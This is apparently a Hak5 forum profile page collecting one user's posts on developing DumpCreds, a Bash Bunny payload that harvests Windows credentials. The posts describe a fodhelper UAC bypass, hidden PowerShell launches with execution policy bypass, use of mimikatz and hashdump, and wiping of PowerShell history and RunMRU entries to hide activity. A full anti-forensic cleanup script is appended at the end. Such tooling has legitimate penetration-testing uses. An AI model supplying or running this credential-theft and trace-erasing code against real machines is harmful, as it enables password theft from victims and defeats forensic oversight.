qdba

Active Members
  • Content Count: 87
  • Joined
  • Last visited
  • Days Won: 2

About qdba
  • Rank: Hak5 Fan ++

Profile Information
  • Gender: Male
  • Location: Stuttgart
  • Interests: IT-Security, Linux, Programming Languages


  1. Maybe a virus scanner; lazagne.exe was mostly caught by AV.
  2. Added multiple UAC modes; set the variable UAC_MODE in payload.txt:
       UAC_MODE=1 # Fodhelper UAC
       UAC_MODE=0 # Standard UAC mode
     Just beta (works on my Windows 10, not tested on 7 yet).
  3. OK... Some new changes (beta state): better cleanup - remove all changes in the PowerShell history - remove all changes in the Run MRU (not only delete the files). https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  4. I must check whether the command for switching off the history is still in the history file after execution. Can't do it now; I have no PowerShell here. The result will give me the route for the rest.
  5. It cannot be done in the line with the main.ps1 call because...... ....... A first PowerShell task will be started for the input of the registry command for the UAC bypass. Then fodhelper opens a second PowerShell task in admin mode. The first PowerShell task can be closed after the fodhelper thing. The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS task. A third PS task is opened, waits for the HTTP server to come up and downloads the main.ps1. The second task is closed with the
  6. Got it... With Set-PSReadlineOption -HistorySaveStyle SaveNothing the history saving in PowerShell is switched off. So I set it at the beginning of the script and delete the history file at the end.
  7. Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the PowerShell history.
  8. Code for clearing the "Run" history was already in main.ps1 .........
       # Empty Run input field
       Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
     ........ Added the code to clear the PowerShell history to main.ps1. We should avoid too many "Q GUI r" commands, because it's visible.
  9. Updated the repo so Hak5 could merge it to the master branch. Changed version to 2.3. Added taskkill /F /IM powershell.exe at the end of main.ps1.
  10. I merged your patch to the master branch. Did some patches so fodhelper starts hidden. https://github.com/qdba/bashbunny-payloads/blob/master/payloads/library/credentials/DumpCreds/payload.txt
  11. @PoSHMagiC0de Thank you for your opinion and suggestion. I give you 100%, writing scripts in function format is not so bad. But... ... When I started writing DumpCreds and other scripts for the BB, I hadn't done anything with PowerShell before. Not even a "Hello World". So I'm fighting a lot with the PowerShell syntax and some effects I did not expect: - output lines are truncated - piping directly to a file on the BB's smbserver.py did not work - when I pipe the output to variables, the CRs and LFs vanish - no idea how to start functions in the background. I'm CIO and CSIO at 3 dif
  12. 1. Do you set the IP of the Remote NDIS driver on your computer manually, or have you enabled ICS sharing? The command GET TARGET_IP only works if your Remote NDIS driver is set to DHCP. 2. If you have admin rights on your computer (the UAC is working), the script is set to AdminMode=True. If you have no admin rights, it doesn't make sense to run mimikatz or hashdump because this works only if you have admin rights. So AdminMode only shows whether you have admin rights ($true) or not ($false).
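The cleanup steps discussed in posts 3, 6 and 8 above (switch off PSReadLine history saving at the start of the script, empty the Explorer RunMRU key, delete the history file at the end), combined into one script as an added example. This is not the DumpCreds payload's own code from the linked repo; the function names, the verification return values and the fallback history path are assumptions made here.

```powershell
# Added example of the cleanup sequence from the posts above; not the
# DumpCreds payload's own code. Function names are assumptions.

function Disable-HistorySaving {
    # Stop PSReadLine from writing further commands to its history file.
    # PSReadLine is only loaded in interactive hosts; elsewhere this is a no-op.
    if (Get-Module -Name PSReadLine) {
        Set-PSReadlineOption -HistorySaveStyle SaveNothing
        return $true
    }
    return $false
}

function Clear-RunMru {
    # Remove the Win+R (Explorer RunMRU) entries left behind by "Q GUI r" input.
    # Returns the value names still present afterwards (empty array = clean).
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (Test-Path $key) {
        Remove-ItemProperty -Path $key -Name '*' -ErrorAction SilentlyContinue
        $remaining = (Get-Item $key).Property
        if ($remaining) { return @($remaining) }
    }
    return @()
}

function Remove-PSHistoryFile {
    # Delete the PSReadLine history file. Ask PSReadLine for the real path;
    # the hard-coded fallback is an assumption for hosts without the module.
    $path = $null
    if (Get-Module -Name PSReadLine) {
        $path = (Get-PSReadlineOption).HistorySavePath
    }
    if (-not $path) {
        $path = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    }
    if (Test-Path $path) {
        Remove-Item -Path $path -Force -ErrorAction SilentlyContinue
    }
    # $true when no history file is left at that location.
    return -not (Test-Path $path)
}

# Usage: disable saving first, do the payload work, then clean up at the end.
$saving = Disable-HistorySaving
# ... payload work goes here ...
$leftInRunMru = Clear-RunMru
$historyGone  = Remove-PSHistoryFile
if ($leftInRunMru.Count -eq 0 -and $historyGone) {
    Write-Verbose 'RunMRU empty and history file removed'
}
```

Two caveats a practitioner would check: SaveNothing only affects the session in which it is set, so it must run inside the same PowerShell process that the "quacked" commands were typed into; and deleting the history file does nothing about the commands that already sit in that session's in-memory history, which is why the posts end the script with taskkill so no host remains to write them back.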